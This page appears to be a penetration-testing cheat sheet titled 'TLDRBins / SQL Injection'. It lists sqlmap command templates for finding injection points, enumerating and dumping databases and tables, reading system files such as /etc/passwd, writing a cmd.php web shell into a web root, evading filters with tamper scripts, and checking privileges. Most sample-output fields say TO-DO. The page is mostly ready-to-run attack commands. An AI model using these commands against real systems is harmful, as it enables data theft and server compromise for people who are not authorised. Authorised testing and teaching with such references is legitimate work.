TLDRBins TLDRBins / SQL Injection

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

1. Copy HTTP Request

+---------------------------------------------------------------+
| In Burp Suite => Right click request => Select `copy to file` |
| Add `*` to the SQL injection point                            |
+---------------------------------------------------------------+

Sample Output:
TO-DO

2. Initial Enum

# HTTP
sqlmap -r request --batch --banner --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10

Sample Output:
TO-DO
# HTTPS
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --force-ssl

Sample Output:
TO-DO
# String to match when query is evaluated to True
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --string '<STRING>'

Sample Output:
# e.g. `Invalid User` vs 500 Internal Server Error 
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --string 'Invalid User'

# Specify Technique
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --technique <TECHNIQUE>

Sample Output:
TO-DO

+------------------------+
| B: Boolean-based blind |
| E: Error-based         |
| U: Union query-based   |
| S: Stacked queries     |
| T: Time-based blind    |
| Q: Inline queries      |
+------------------------+

Sample Output:
TO-DO

3. Database Enum

# Get Databases
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --dbs

Sample Output:
TO-DO
# Get Tables
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 -D <DB_NAME> --tables

Sample Output:
TO-DO
# Dump Table
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 -D <DB_NAME> -T <TABLE_NAME> --dump

Sample Output:
TO-DO
# Dump All Tables (Slow)
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 -D <DB_NAME> --dump

Sample Output:
TO-DO

4. Advance

# File Read
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --random-agent --file-read <FILE>

Sample Output:
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --random-agent --file-read /etc/passwd

# File Write
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --random-agent --file-write <FILE> --file-dest <FILE_DEST>

Sample Output:
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --random-agent --file-write ./cmd.php --file-dest /var/www/html/cmd.php

# Add Payload Tampering Script
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --tamper <TAMPER_SCRIPT>

Sample Output:
# e.g. randomcase
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --tamper randomcase

# Check Privileges
sqlmap -r request --privileges

Sample Output:
TO-DO

tamper.py Template

#!/usr/bin/env python3

from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    return payload

Sample Output:
TO-DO

Note: Create an empty __init__.py in the same folder